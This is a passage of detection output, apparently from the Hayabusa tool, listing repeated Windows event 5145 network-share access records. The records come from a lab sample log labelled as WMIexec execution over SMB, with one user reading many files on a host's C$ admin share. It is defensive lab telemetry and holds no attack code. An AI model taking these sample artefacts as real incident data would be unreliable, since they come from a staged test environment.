10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 